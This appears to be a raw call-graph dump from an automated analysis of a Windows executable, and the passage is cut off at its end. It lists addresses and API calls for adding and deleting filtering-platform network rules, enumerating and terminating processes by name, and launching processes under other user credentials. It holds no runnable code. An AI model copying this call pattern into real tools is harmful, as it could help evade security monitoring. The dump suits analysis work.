7ff7048914e2 6 API calls 9205->9208 9209 7ff7048914e2 6 API calls 9206->9209 9210 7ff7048947f3 9207->9210 9211 7ff704894646 _errno 9207->9211 9208->9212 9213 7ff704894742 _errno 9209->9213 9219 7ff704894802 9210->9219 9220 7ff70489482b _errno 9210->9220 9214 7ff7048914e2 6 API calls 9211->9214 9215 7ff7048914e2 6 API calls 9212->9215 9216 7ff70489478f _errno 9213->9216 9217 7ff70489474b 9213->9217 9218 7ff704894668 _errno 9214->9218 9221 7ff704894b78 9215->9221 9224 7ff70489481e 9216->9224 9217->9216 9218->9222 9223 7ff7048947da _errno 9218->9223 9219->9224 9228 7ff7048948b3 fseek 9219->9228 9225 7ff7048914e2 6 API calls 9220->9225 9221->9110 9221->9118 9222->9202 9223->9224 9226 7ff704894b35 9224->9226 9227 7ff704894b2d fclose 9224->9227 9229 7ff70489484d _errno 9225->9229 9226->9212 9230 7ff704894ba2 9226->9230 9227->9226 9234 7ff704894941 _errno 9228->9234 9235 7ff7048948cd 9228->9235 9232 7ff704894856 9229->9232 9233 7ff70489489a _errno 9229->9233 9231 7ff7048914e2 6 API calls 9230->9231 9231->9221 9232->9233 9233->9224 9236 7ff7048914e2 6 API calls 9234->9236 9237 7ff7048949c9 GetProcessHeap HeapAlloc 9235->9237 9252 7ff7048948df 9235->9252 9238 7ff704894963 _errno 9236->9238 9239 7ff7048949f1 9237->9239 9237->9252 9240 7ff7048949b0 _errno 9238->9240 9241 7ff70489496c 9238->9241 9242 7ff7048914e2 6 API calls 9239->9242 9240->9224 9241->9240 9244 7ff704894a07 9242->9244 9243 7ff704894a9e 9246 7ff704894aa9 9243->9246 9247 7ff7048914e2 6 API calls 9243->9247 9244->9252 9245 7ff70489490d fread 9245->9243 9245->9252 9246->9224 9249 7ff704894ab4 GetProcessHeap HeapFree 9246->9249 9247->9246 9248 7ff704894a0c _errno 9250 7ff7048914e2 6 API calls 9248->9250 9249->9224 9251 7ff704894a2e _errno 9250->9251 9251->9252 9253 7ff704894a7b _errno 9251->9253 9252->9224 9252->9243 9252->9245 9252->9248 9252->9253 9253->9252 9255 7ff704891956 fclose 9254->9255 9256 7ff70489195b 9254->9256 9255->9256 9257 7ff704891983 DeleteCriticalSection 9256->9257 9258 7ff704891989 9256->9258 9257->9258 9259 7ff7048914e2 6 API calls 9258->9259 9260 7ff70489143c 9259->9260 9260->9005 9260->9006 9262 7ff704896272 9261->9262 9263 7ff7048962e4 9261->9263 9264 7ff70489627f UnlockFileEx 9262->9264 9265 7ff704896315 9262->9265 9266 7ff7048914e2 6 API calls 9263->9266 9267 7ff704896372 GetLastError 9264->9267 9268 7ff7048962b9 CloseHandle 9264->9268 9269 7ff7048914e2 6 API calls 9265->9269 9274 7ff70489630d 9266->9274 9270 7ff7048914e2 6 API calls 9267->9270 9271 7ff7048914e2 6 API calls 9268->9271 9269->9274 9270->9274 9272 7ff7048962d8 9271->9272 9272->9005 9273 7ff7048914e2 6 API calls 9273->9272 9274->9273 9276 7ff704897785 9275->9276 9277 7ff704897789 9276->9277 9278 7ff7048977cd 9276->9278 9281 7ff7048977ea 9277->9281 9285 7ff7048977c6 9277->9285 9279 7ff7048914e2 6 API calls 9278->9279 9280 7ff7048977e3 9279->9280 9280->9018 9280->9020 9282 7ff7048914e2 6 API calls 9281->9282 9283 7ff704897800 9282->9283 9284 7ff704897817 FwpmProviderDestroyEnumHandle0 9283->9284 9284->9280 9287 7ff70489788a 9284->9287 9285->9283 9286 7ff704897865 wcscmp 9285->9286 9286->9285 9287->9280 9288 7ff7048914e2 6 API calls 9287->9288 9288->9280 9351 7ff704899bb9 9289->9351 9292 7ff704899537 9293 7ff704899bb9 7 API calls 9292->9293 9296 7ff704899566 9293->9296 9294 7ff70489960d 9294->9027 9296->9294 9298 7ff7048914e2 6 API calls 9296->9298 9368 7ff70489a1f1 9296->9368 9374 7ff70489929a inet_addr ntohl 9296->9374 9298->9296 9300 7ff704899bb9 7 API calls 9299->9300 9301 7ff704898599 9300->9301 9302 7ff7048986c1 GetLastError 9301->9302 9303 7ff7048985dc 9301->9303 9309 7ff7048986df 9301->9309 9304 7ff7048914e2 6 API calls 9302->9304 9305 7ff7048987a3 GetLastError 9303->9305 9310 7ff70489860e 9303->9310 9304->9309 9306 7ff7048987b4 9305->9306 9305->9310 9308 7ff7048914e2 6 API calls 9306->9308 9307 7ff704898ca5 CloseHandle 9307->9309 9308->9310 9309->9025 9310->9307 9311 7ff70489a1f1 11 API calls 9310->9311 9312 7ff7048988cd OpenProcess 9310->9312 9313 7ff704898669 Process32Next 9310->9313 9321 7ff7048914e2 6 API calls 9310->9321 9322 7ff704898a13 CloseHandle 9310->9322 9323 7ff7048986af 9310->9323 9418 7ff704898153 9310->9418 9311->9310 9314 7ff704898a78 GetLastError 9312->9314 9315 7ff7048988ee QueryFullProcessImageNameW 9312->9315 9313->9310 9318 7ff70489867d GetLastError 9313->9318 9317 7ff7048914e2 6 API calls 9314->9317 9315->9310 9316 7ff70489892e GetLastError 9315->9316 9319 7ff7048914e2 6 API calls 9316->9319 9317->9310 9318->9310 9319->9310 9321->9310 9322->9310 9323->9322 9324 7ff7048914e2 6 API calls 9323->9324 9324->9323 9326 7ff704899bb9 7 API calls 9325->9326 9327 7ff704898d38 9326->9327 9336 7ff704899257 9327->9336 9481 7ff704891cf4 9327->9481 9330 7ff704898d82 9332 7ff704898d8a 9330->9332 9334 7ff704891c73 8 API calls 9330->9334 9333 7ff704898da9 FreeLibrary 9332->9333 9332->9336 9333->9336 9335 7ff704898dc6 9334->9335 9335->9336 9337 7ff704891c73 8 API calls 9335->9337 9336->9019 9338 7ff704898de3 9337->9338 9338->9336 9339 7ff704891c73 8 API calls 9338->9339 9340 7ff704898e00 9339->9340 9340->9336 9341 7ff704891c73 8 API calls 9340->9341 9350 7ff704898e18 9341->9350 9342 7ff70489a1f1 11 API calls 9342->9350 9343 7ff704898ecc strlen 9343->9350 9344 7ff704898f64 GetProcessHeap HeapAlloc 9344->9350 9345 7ff704898fb2 BuildTrusteeWithSidW BuildSecurityDescriptorW 9345->9350 9346 7ff7048914e2 6 API calls 9346->9350 9348 7ff7048990f2 GetProcessHeap HeapFree 9348->9350 9349 7ff7048991dc LocalFree 9349->9350 9350->9332 9350->9336 9350->9342 9350->9343 9350->9344 9350->9345 9350->9346 9350->9348 9350->9349 9497 7ff70489795a GetProcessHeap HeapAlloc 9350->9497 9352 7ff704899bd1 9351->9352 9353 7ff704899bec 9351->9353 9354 7ff704899c1f 9352->9354 9355 7ff704899bd6 9352->9355 9356 7ff7048914e2 6 API calls 9353->9356 9358 7ff7048914e2 6 API calls 9354->9358 9357 7ff704899c52 9355->9357 9364 7ff704899bdb 9355->9364 9363 7ff704899c15 9356->9363 9359 7ff7048914e2 6 API calls 9357->9359 9358->9363 9359->9363 9360 7ff704899cbc 9362 7ff704899cc3 9360->9362 9360->9363 9361 7ff704899c91 strcmp 9361->9364 9365 7ff7048914e2 6 API calls 9362->9365 9366 7ff7048914e2 6 API calls 9363->9366 9364->9360 9364->9361 9367 7ff704899689 9365->9367 9366->9367 9367->9022 9367->9027 9367->9292 9369 7ff70489a200 9368->9369 9370 7ff70489a22c 9368->9370 9381 7ff70489a0f0 9369->9381 9372 7ff7048914e2 6 API calls 9370->9372 9373 7ff70489a217 9372->9373 9373->9296 9375 7ff70489932b 9374->9375 9376 7ff70489937a 9374->9376 9377 7ff7048914e2 6 API calls 9375->9377 9380 7ff70489934f 9375->9380 9378 7ff7048914e2 6 API calls 9376->9378 9377->9380 9379 7ff70489952d 9378->9379 9380->9296 9382 7ff70489a112 9381->9382 9383 7ff70489a153 9381->9383 9393 7ff704899ed0 9382->9393 9384 7ff7048914e2 6 API calls 9383->9384 9388 7ff70489a12b 9384->9388 9387 7ff70489a183 _errno 9389 7ff7048a0568 9387->9389 9388->9373 9390 7ff70489a1a5 _errno 9389->9390 9390->9388 9391 7ff70489a1b4 _errno 9390->9391 9392 7ff7048914e2 6 API calls 9391->9392 9392->9388 9394 7ff704899ee1 9393->9394 9395 7ff704899f19 9393->9395 9397 7ff704899bb9 7 API calls 9394->9397 9396 7ff7048914e2 6 API calls 9395->9396 9400 7ff704899ef8 9396->9400 9398 7ff704899ef4 9397->9398 9398->9400 9401 7ff704899d40 9398->9401 9400->9387 9400->9388 9402 7ff704899d73 9401->9402 9403 7ff704899d58 9401->9403 9406 7ff7048914e2 6 API calls 9402->9406 9404 7ff704899da6 9403->9404 9405 7ff704899d5d 9403->9405 9408 7ff7048914e2 6 API calls 9404->9408 9407 7ff704899dd9 9405->9407 9413 7ff704899d62 9405->9413 9415 7ff704899d9c 9406->9415 9409 7ff7048914e2 6 API calls 9407->9409 9408->9415 9409->9415 9410 7ff704899e3b 9412 7ff704899e44 9410->9412 9410->9415 9411 7ff704899e18 strcmp 9411->9413 9414 7ff7048914e2 6 API calls 9412->9414 9413->9410 9413->9411 9416 7ff704899e69 9414->9416 9417 7ff7048914e2 6 API calls 9415->9417 9416->9400 9417->9416 9441 7ff704898008 GetFileAttributesW 9418->9441 9420 7ff70489817c 9421 7ff704898192 wcslen 9420->9421 9438 7ff704898182 9420->9438 9458 7ff704897102 9421->9458 9423 7ff7048981aa 9424 7ff7048982b9 FwpmFilterAdd0 9423->9424 9425 7ff704898239 FwpmFilterDeleteByKey0 9423->9425 9426 7ff704898461 9424->9426 9427 7ff7048984ce FwpmFilterAdd0 9424->9427 9428 7ff704898277 FwpmFilterDeleteByKey0 9425->9428 9429 7ff70489825a 9425->9429 9430 7ff7048914e2 6 API calls 9426->9430 9431 7ff704898540 9427->9431 9432 7ff704898474 9427->9432 9434 7ff70489829c 9428->9434 9428->9438 9433 7ff7048914e2 6 API calls 9429->9433 9430->9432 9437 7ff7048914e2 6 API calls 9431->9437 9435 7ff7048984a1 9432->9435 9436 7ff70489848a GetProcessHeap HeapFree 9432->9436 9433->9438 9439 7ff7048914e2 6 API calls 9434->9439 9435->9438 9440 7ff7048984b2 GetProcessHeap HeapFree 9435->9440 9436->9435 9437->9432 9438->9310 9439->9438 9440->9438 9442 7ff704898028 9441->9442 9443 7ff704898149 9441->9443 9464 7ff704897e04 9442->9464 9445 7ff70489803b 9446 7ff70489804f GetProcessHeap HeapAlloc 9445->9446 9456 7ff704898041 9445->9456 9447 7ff7048980d9 9446->9447 9452 7ff704898071 9446->9452 9449 7ff7048914e2 6 API calls 9447->9449 9448 7ff70489807b wcslen GetProcessHeap HeapAlloc 9450 7ff7048980f7 9448->9450 9451 7ff7048980bb 9448->9451 9449->9452 9453 7ff7048914e2 6 API calls 9450->9453 9454 7ff70489810f 9451->9454 9455 7ff7048980c7 memcpy 9451->9455 9452->9448 9452->9456 9453->9451 9454->9456 9457 7ff704898114 GetProcessHeap HeapFree 9454->9457 9455->9456 9456->9420 9457->9456 9459 7ff70489710b 9458->9459 9460 7ff70489711d 9458->9460 9462 7ff704897110 9459->9462 9463 7ff7048914e2 6 API calls 9459->9463 9461 7ff7048914e2 6 API calls 9460->9461 9461->9462 9462->9423 9463->9462 9465 7ff704897e59 9464->9465 9466 7ff704897e6f QueryDosDeviceW 9465->9466 9471 7ff704897e5f 9465->9471 9467 7ff704897e90 GetLastError 9466->9467 9468 7ff704897f6c 9466->9468 9469 7ff7048914e2 6 API calls 9467->9469 9472 7ff704897de7 9468->9472 9469->9471 9471->9445 9475 7ff70489b270 9472->9475 9476 7ff70489b295 9475->9476 9477 7ff70489b27e 9475->9477 9479 7ff70489dadd fputwc fwprintf _errno 9476->9479 9478 7ff70489dadd fputwc fwprintf _errno 9477->9478 9480 7ff704897dff 9478->9480 9479->9480 9480->9471 9482 7ff704891d02 LoadLibraryA 9481->9482 9483 7ff704891d2b 9481->9483 9484 7ff704891d10 9482->9484 9485 7ff704891d2e GetLastError 9482->9485 9483->9485 9486 7ff7048914e2 6 API calls 9484->9486 9487 7ff7048914e2 6 API calls 9485->9487 9488 7ff704891d29 9486->9488 9487->9488 9488->9330 9489 7ff704891c73 9488->9489 9490 7ff704891c90 GetProcAddress 9489->9490 9491 7ff704891cc1 9489->9491 9492 7ff704891ca1 9490->9492 9493 7ff704891cc6 GetLastError 9490->9493 9491->9493 9494 7ff7048914e2 6 API calls 9492->9494 9495 7ff7048914e2 6 API calls 9493->9495 9496 7ff704891cbf 9494->9496 9495->9496 9496->9330 9498 7ff704897c4f 9497->9498 9499 7ff7048979a1 9497->9499 9501 7ff7048914e2 6 API calls 9498->9501 9500 7ff704897102 6 API calls 9499->9500 9503 7ff7048979b1 9500->9503 9502 7ff704897c3b 9501->9502 9502->9350 9504 7ff704897a46 9503->9504 9505 7ff704897c6c FwpmFilterDeleteByKey0 9503->9505 9510 7ff704897b20 FwpmFilterAdd0 9504->9510 9506 7ff704897ca7 FwpmFilterDeleteByKey0 9505->9506 9507 7ff704897c8d 9505->9507 9506->9502 9509 7ff704897cd2 9506->9509 9508 7ff7048914e2 6 API calls 9507->9508 9508->9502 9511 7ff7048914e2 6 API calls 9509->9511 9512 7ff704897cef FwpmFilterAdd0 9510->9512 9513 7ff704897c07 9510->9513 9511->9502 9515 7ff704897d5d 9512->9515 9514 7ff7048914e2 6 API calls 9513->9514 9516 7ff704897c1a 9514->9516 9517 7ff7048914e2 6 API calls 9515->9517 9516->9502 9518 7ff704897c24 GetProcessHeap HeapFree 9516->9518 9519 7ff704897d7a 9517->9519 9518->9502 10057 7ff70489212f 10058 7ff7048921b6 10057->10058 10059 7ff704892159 CreateToolhelp32Snapshot 10057->10059 10062 7ff7048914e2 6 API calls 10058->10062 10060 7ff704892175 Process32First 10059->10060 10061 7ff704892227 GetLastError 10059->10061 10063 7ff7048922ff GetLastError 10060->10063 10086 7ff7048921a6 10060->10086 10064 7ff7048914e2 6 API calls 10061->10064 10071 7ff7048921df 10062->10071 10065 7ff70489230c 10063->10065 10064->10071 10066 7ff7048914e2 6 API calls 10065->10066 10066->10086 10067 7ff7048921f4 10072 7ff7048914e2 6 API calls 10067->10072 10068 7ff7048928a3 10078 7ff7048914e2 6 API calls 10068->10078 10069 7ff704892888 CloseHandle 10069->10068 10069->10071 10071->10067 10071->10068 10073 7ff704892211 10072->10073 10074 7ff7048924d3 OpenProcess 10076 7ff7048925a3 GetLastError 10074->10076 10077 7ff7048924f4 TerminateProcess 10074->10077 10075 7ff7048924c2 strcmp 10075->10074 10075->10086 10082 7ff7048914e2 6 API calls 10076->10082 10080 7ff704892484 CloseHandle 10077->10080 10081 7ff70489250a GetLastError 10077->10081 10078->10073 10079 7ff7048926ed Process32Next 10083 7ff704892704 GetLastError 10079->10083 10079->10086 10080->10086 10084 7ff7048914e2 6 API calls 10081->10084 10082->10086 10083->10086 10084->10086 10085 7ff7048914e2 6 API calls 10085->10086 10086->10069 10086->10074 10086->10075 10086->10079 10086->10080 10086->10085 11182 7ff70489702f 11183 7ff704897057 wcslen 11182->11183 11184 7ff70489704b 11182->11184 11183->11184 11185 7ff70489dc2f 11186 7ff70489dc62 11185->11186 11187 7ff70489dc56 11185->11187 11188 7ff70489cacd 10 API calls 11186->11188 11189 7ff70489ccd9 2 API calls 11187->11189 11193 7ff70489db86 11188->11193 11189->11193 11190 7ff70489e2e0 11191 7ff70489e301 11190->11191 11192 7ff70489ccd9 2 API calls 11190->11192 11192->11191 11193->11190 11194 7ff70489ccd9 fputwc fwprintf 11193->11194 11195 7ff70489d1bd fputwc 11193->11195 11194->11193 11195->11193 10467 7ff70489c631 10470 7ff70489c64d 10467->10470 10468 7ff70489b5da fputc 10475 7ff70489c382 10468->10475 10469 7ff70489c6c3 10469->10468 10470->10469 10471 7ff70489c6c8 10470->10471 10476 7ff70489bdaf 10471->10476 10473 7ff70489ca67 10474 7ff70489b3e7 fputc 10474->10475 10475->10473 10475->10474 10477 7ff70489bdc6 10476->10477 10478 7ff70489bf5e 10477->10478 10484 7ff70489b3e7 fputc 10477->10484 10479 7ff70489bf9d 10478->10479 10480 7ff70489b3e7 fputc 10478->10480 10481 7ff70489b3e7 fputc 10479->10481 10480->10479 10482 7ff70489bfaa 10481->10482 10483 7ff70489b3e7 fputc 10482->10483 10486 7ff70489bfbb 10483->10486 10484->10477 10485 7ff70489c008 10490 7ff70489c054 10485->10490 10491 7ff70489b3e7 fputc 10485->10491 10487 7ff70489bfc1 10486->10487 10488 7ff70489b3e7 fputc 10486->10488 10487->10485 10489 7ff70489b64c 11 API calls 10487->10489 10493 7ff70489b3e7 fputc 10487->10493 10495 7ff70489b420 5 API calls 10487->10495 10488->10486 10489->10487 10492 7ff70489b3e7 fputc 10490->10492 10491->10485 10494 7ff70489c068 10492->10494 10493->10487 10495->10487 11200 7ff70489c436 11201 7ff70489c44b 11200->11201 11202 7ff70489c48e 11200->11202 11204 7ff70489c475 wcslen 11201->11204 11205 7ff70489c46e 11201->11205 11203 7ff70489b593 strlen 11202->11203 11209 7ff70489c382 11203->11209 11204->11205 11206 7ff70489b420 5 API calls 11205->11206 11206->11209 11207 7ff70489ca67 11208 7ff70489b3e7 fputc 11208->11209 11209->11207 11209->11208 10496 7ff70489de28 10497 7ff70489de3e 10496->10497 10505 7ff70489d126 10497->10505 10499 7ff70489e2e0 10500 7ff70489e301 10499->10500 10501 7ff70489ccd9 2 API calls 10499->10501 10501->10500 10502 7ff70489db86 10502->10499 10503 7ff70489ccd9 fputwc fwprintf 10502->10503 10504 7ff70489d1bd fputwc 10502->10504 10503->10502 10504->10502 10506 7ff70489d137 10505->10506 10507 7ff70489d00f 6 API calls 10506->10507 10508 7ff70489d164 10507->10508 10509 7ff70489d186 10508->10509 10510 7ff70489d179 10508->10510 10512 7ff70489cdd0 9 API calls 10509->10512 10511 7ff70489cc00 10 API calls 10510->10511 10515 7ff70489d184 10511->10515 10513 7ff70489d191 10512->10513 10514 7ff70489ca90 fputwc 10513->10514 10513->10515 10514->10513 10515->10502 11210 7ff70489ac27 11211 7ff70489ac4e 11210->11211 11212 7ff70489acdf signal 11211->11212 11213 7ff70489acb5 11211->11213 11215 7ff70489ac6f 11211->11215 11212->11213 11212->11215 11214 7ff70489acfb signal 11213->11214 11213->11215 11214->11215 10094 7ff70489292e 10095 7ff704892944 10094->10095 10096 7ff704892a53 10095->10096 10097 7ff70489299e 10095->10097 10098 7ff7048914e2 6 API calls 10096->10098 10099 7ff704892a87 10097->10099 10100 7ff7048929a7 10097->10100 10107 7ff7048929d5 10098->10107 10101 7ff7048914e2 6 API calls 10099->10101 10102 7ff704892abb 10100->10102 10103 7ff7048929bd strlen 10100->10103 10101->10107 10104 7ff7048914e2 6 API calls 10102->10104 10105 7ff704892aef strcat 10103->10105 10103->10107 10104->10107 10106 7ff704892b08 strlen strlen 10105->10106 10111 7ff704892bec 10105->10111 10106->10107 10108 7ff704892b38 strlen strcat 10106->10108 10117 7ff7048914e2 6 API calls 10107->10117 10132 7ff7048931b1 10107->10132 10109 7ff704892b74 10108->10109 10110 7ff704892b95 strlen strlen 10109->10110 10109->10111 10110->10111 10113 7ff704892bbc strlen strcat 10110->10113 10111->10107 10126 7ff704892c1a 10111->10126 10127 7ff704893032 10111->10127 10112 7ff704893041 CreateProcessA 10115 7ff704893191 10112->10115 10116 7ff704893098 GetLastError 10112->10116 10113->10109 10114 7ff704892c32 LogonUserA 10118 7ff704892c63 GetLastError 10114->10118 10119 7ff704892d9d CreateProcessAsUserA 10114->10119 10125 7ff7048914e2 6 API calls 10115->10125 10121 7ff7048914e2 6 API calls 10116->10121 10124 7ff704892a3c 10117->10124 10120 7ff7048914e2 6 API calls 10118->10120 10122 7ff704892dfc GetLastError 10119->10122 10123 7ff704892eed 10119->10123 10120->10126 10121->10127 10128 7ff7048914e2 6 API calls 10122->10128 10129 7ff7048914e2 6 API calls 10123->10129 10125->10132 10126->10114 10133 7ff704892ce5 10126->10133 10127->10107 10127->10112 10128->10133 10129->10133 10130 7ff704892f27 CloseHandle 10131 7ff704892f2d 10130->10131 10131->10107 10134 7ff704892f36 10131->10134 10133->10130 10133->10131 10134->10132 10135 7ff7048914e2 6 API calls 10134->10135 10135->10124 10841 7ff70489ff1f GetModuleHandleW GetProcAddress 10842 7ff70489ff73 10841->10842 10843 7ff70489ff4c LoadLibraryW GetProcAddress 10841->10843 10843->10842 10523 7ff704893222 10524 7ff704893230 WaitForSingleObject 10523->10524 10525 7ff70489325c 10523->10525 10526 7ff70489328c GetLastError 10524->10526 10529 7ff704893240 10524->10529 10527 7ff7048914e2 6 API calls 10525->10527 10528 7ff7048914e2 6 API calls 10526->10528 10527->10529 10528->10529 10847 7ff7048a0721 DeleteCriticalSection 10136 7ff704895923 10137 7ff7048959d4 10136->10137 10138 7ff704895936 10136->10138 10141 7ff7048914e2 6 API calls 10137->10141 10139 7ff70489593f CreateFileA 10138->10139 10140 7ff704895a04 10138->10140 10143 7ff704895a34 GetLastError 10139->10143 10144 7ff70489597c GetFileSize 10139->10144 10142 7ff7048914e2 6 API calls 10140->10142 10147 7ff7048959b4 10141->10147 10142->10147 10148 7ff70489599b 10143->10148 10145 7ff704895afa GetLastError 10144->10145 10144->10148 10145->10148 10146 7ff7048959ab CloseHandle 10146->10147 10148->10146 10148->10147 10530 7ff70489f626 10531 7ff70489f63b DeleteCriticalSection 10530->10531 10532 7ff70489f65d 10530->10532 10531->10532 10533 7ff704891a19 10534 7ff704891b02 10533->10534 10535 7ff704891a32 10533->10535 10538 7ff7048914e2 6 API calls 10534->10538 10536 7ff704891a3b FindResourceA 10535->10536 10537 7ff704891b2d 10535->10537 10539 7ff704891b58 GetLastError 10536->10539 10540 7ff704891a58 LoadResource 10536->10540 10541 7ff7048914e2 6 API calls 10537->10541 10548 7ff704891af2 10538->10548 10544 7ff7048914e2 6 API calls 10539->10544 10542 7ff704891a70 10540->10542 10543 7ff704891b86 GetLastError GetLastError 10540->10543 10541->10548 10546 7ff7048914e2 6 API calls 10542->10546 10545 7ff7048914e2 6 API calls 10543->10545 10547 7ff704891b79 10544->10547 10545->10548 10546->10548 10547->10543 10547->10548 10548->10548 10851 7ff70489131a 10852 7ff704891131 152 API calls 10851->10852 10853 7ff70489132e 10852->10853 11234 7ff70489181b 11235 7ff7048917b9 11234->11235 11236 7ff7048914e2 6 API calls 11235->11236 11237 7ff7048917d6 11236->11237 10156 7ff70489c51b 10157 7ff70489c52d 10156->10157 10162 7ff70489bbb4 10157->10162 10159 7ff70489ca67 10160 7ff70489b3e7 fputc 10161 7ff70489c382 10160->10161 10161->10159 10161->10160 10163 7ff70489bbe6 10162->10163 10165 7ff70489bd06 10163->10165 10169 7ff70489b3e7 fputc 10163->10169 10164 7ff70489bd86 10166 7ff70489bda2 10164->10166 10168 7ff70489b3e7 fputc 10164->10168 10165->10164 10167 7ff70489b3e7 fputc 10165->10167 10166->10161 10167->10165 10168->10164 10169->10163 11238 7ff70489341c 11239 7ff7048934ad 11238->11239 11240 7ff70489342e GetExitCodeProcess 11238->11240 11241 7ff7048914e2 6 API calls 11239->11241 11242 7ff70489350f GetLastError 11240->11242 11243 7ff704893444 11240->11243 11246 7ff7048934d6 11241->11246 11244 7ff7048914e2 6 API calls 11242->11244 11245 7ff704893452 WaitForSingleObject GetExitCodeProcess 11243->11245 11243->11246 11249 7ff7048935f9 TerminateProcess 11243->11249 11244->11246 11247 7ff7048936f1 GetLastError 11245->11247 11248 7ff704893476 11245->11248 11251 7ff7048937ac 11246->11251 11253 7ff7048914e2 6 API calls 11246->11253 11250 7ff7048914e2 6 API calls 11247->11250 11260 7ff7048933c0 11248->11260 11249->11245 11255 7ff70489360a GetLastError 11249->11255 11250->11246 11259 7ff7048934ab 11253->11259 11257 7ff7048914e2 6 API calls 11255->11257 11256 7ff704893484 11258 7ff7048914e2 6 API calls 11256->11258 11257->11243 11258->11259 11261 7ff7048933ec 11260->11261 11262 7ff7048933ce CloseHandle CloseHandle 11260->11262 11264 7ff7048914e2 6 API calls 11261->11264 11263 7ff7048933e5 11262->11263 11263->11246 11263->11256 11264->11263 10549 7ff70489a650 10550 7ff70489a659 10549->10550 10551 7ff70489a662 10550->10551 10553 7ff70489aebd 10550->10553 10554 7ff70489aecb 10553->10554 10556 7ff70489aed3 10553->10556 10555 7ff70489aee1 10554->10555 10554->10556 10558 7ff70489aed1 10554->10558 10555->10556 10557 7ff70489aeeb InitializeCriticalSection 10555->10557 10556->10551 10557->10556 10558->10556 10559 7ff70489af37 DeleteCriticalSection 10558->10559 10560 7ff70489af29 free 10558->10560 10559->10556 10560->10558 10561 7ff70489ae48 10562 7ff70489aeb4 10561->10562 10563 7ff70489ae5a EnterCriticalSection 10561->10563 10565 7ff70489ae73 10563->10565 10564 7ff70489aeab LeaveCriticalSection 10564->10562 10565->10564 10566 7ff70489ae98 free 10565->10566 10566->10564 10175 7ff70489354e 10176 7ff7048934db 10175->10176 10177 7ff7048937ac 10176->10177 10178 7ff7048914e2 6 API calls 10176->10178 10179 7ff704893505 10178->10179 11276 7ff704895c44 11277 7ff704895c60 11276->11277 11286 7ff704895cdf 11276->11286 11278 7ff704895c79 CreateFileA 11277->11278 11280 7ff704895d24 11277->11280 11281 7ff704895cb2 GetFileTime 11278->11281 11282 7ff704895ccc GetLastError 11278->11282 11279 7ff7048914e2 6 API calls 11288 7ff704895d1a 11279->11288 11283 7ff7048914e2 6 API calls 11280->11283 11281->11282 11284 7ff704895d57 11281->11284 11282->11284 11285 7ff704895cd9 11282->11285 11283->11288 11287 7ff704895deb CloseHandle 11284->11287 11284->11288 11285->11284 11285->11286 11286->11279 11287->11288 11289 7ff70489e045 11291 7ff70489db86 11289->11291 11290 7ff70489e2e0 11292 7ff70489e301 11290->11292 11293 7ff70489ccd9 2 API calls 11290->11293 11291->11290 11294 7ff70489ccd9 fputwc fwprintf 11291->11294 11295 7ff70489d1bd fputwc 11291->11295 11293->11292 11294->11291 11295->11291 10187 7ff704892d71 10188 7ff704892f1c 10187->10188 10189 7ff704892f27 CloseHandle 10188->10189 10190 7ff704892f2d 10188->10190 10189->10190 10191 7ff704892f36 10190->10191 10192 7ff7048929db 10190->10192 10193 7ff7048931b6 10191->10193 10194 7ff7048914e2 6 API calls 10191->10194 10192->10193 10195 7ff7048914e2 6 API calls 10192->10195 10196 7ff704892a3c 10194->10196 10195->10196 11300 7ff70489a072 11301 7ff70489a0b6 11300->11301 11302 7ff70489a08c 11300->11302 11303 7ff7048914e2 6 API calls 11301->11303 11306 7ff704899f70 11302->11306 11305 7ff70489a0a3 11303->11305 11307 7ff704899fd7 11306->11307 11308 7ff704899f9b 11306->11308 11310 7ff7048914e2 6 API calls 11307->11310 11309 7ff704899ed0 8 API calls 11308->11309 11311 7ff704899fae 11309->11311 11312 7ff704899fb4 11310->11312 11311->11312 11313 7ff70489a007 _errno 11311->11313 11312->11305 11314 7ff7048a0560 11313->11314 11315 7ff70489a029 _errno 11314->11315 11315->11312 11316 7ff70489a034 _errno 11315->11316 11317 7ff7048914e2 6 API calls 11316->11317 11317->11312 10587 7ff7048a0671 HeapFree 10588 7ff7048ab608 10587->10588 10876 7ff704896776 10877 7ff7048967fb 10876->10877 10878 7ff70489678c 10876->10878 10881 7ff7048914e2 6 API calls 10877->10881 10879 7ff704896795 10878->10879 10880 7ff70489682e 10878->10880 10882 7ff70489685e 10879->10882 10883 7ff70489679e 10879->10883 10884 7ff7048914e2 6 API calls 10880->10884 10899 7ff704896824 10881->10899 10885 7ff7048914e2 6 API calls 10882->10885 10886 7ff7048967aa ExpandEnvironmentStringsA 10883->10886 10887 7ff70489688e 10883->10887 10884->10899 10885->10899 10889 7ff704896909 GetLastError 10886->10889 10890 7ff7048967bb 10886->10890 10888 7ff7048914e2 6 API calls 10887->10888 10888->10899 10894 7ff7048914e2 6 API calls 10889->10894 10892 7ff7048967c9 10890->10892 10893 7ff7048969dc 10890->10893 10891 7ff704896a51 10896 7ff7048914e2 6 API calls 10892->10896 10897 7ff7048914e2 6 API calls 10893->10897 10894->10899 10895 7ff7048914e2 6 API calls 10898 7ff7048967f1 10895->10898 10896->10898 10897->10899 10899->10891 10899->10895 11348 7ff70489dc75 11349 7ff70489dc8a 11348->11349 11350 7ff70489dccd 11348->11350 11352 7ff70489dcb4 wcslen 11349->11352 11353 7ff70489dcad 11349->11353 11351 7ff70489cfc8 strlen 11350->11351 11359 7ff70489db86 11351->11359 11352->11353 11354 7ff70489ccd9 2 API calls 11353->11354 11354->11359 11355 7ff70489e2e0 11356 7ff70489e301 11355->11356 11357 7ff70489ccd9 2 API calls 11355->11357 11357->11356 11358 7ff70489ccd9 fputwc fwprintf 11358->11359 11359->11355 11359->11358 11360 7ff70489d1bd fputwc 11359->11360 11360->11359 11377 7ff704894c69 11378 7ff704894be8 11377->11378 11379 7ff704894d5a 11378->11379 11380 7ff704894c0a 11378->11380 11381 7ff7048914e2 6 API calls 11379->11381 11382 7ff7048914e2 6 API calls 11380->11382 11383 7ff704894d7c 11381->11383 11384 7ff704894c20 11382->11384 11383->11383 10909 7ff70489a369 10910 7ff70489a378 10909->10910 10911 7ff70489a3a7 10909->10911 10915 7ff70489a264 10910->10915 10912 7ff7048914e2 6 API calls 10911->10912 10914 7ff70489a390 10912->10914 10916 7ff70489a286 10915->10916 10917 7ff70489a2c9 10915->10917 10918 7ff704899ed0 8 API calls 10916->10918 10919 7ff7048914e2 6 API calls 10917->10919 10920 7ff70489a299 10918->10920 10921 7ff70489a29f 10919->10921 10920->10921 10922 7ff70489a2f9 _errno _strtoui64 _errno 10920->10922 10921->10914 10922->10921 10923 7ff70489a32c _errno 10922->10923 10924 7ff7048914e2 6 API calls 10923->10924 10924->10921 10589 7ff70489a66c 10590 7ff70489a67e 10589->10590 10591 7ff70489a693 10590->10591 10592 7ff70489aebd 3 API calls 10590->10592 10592->10591 10197 7ff704896d60 10198 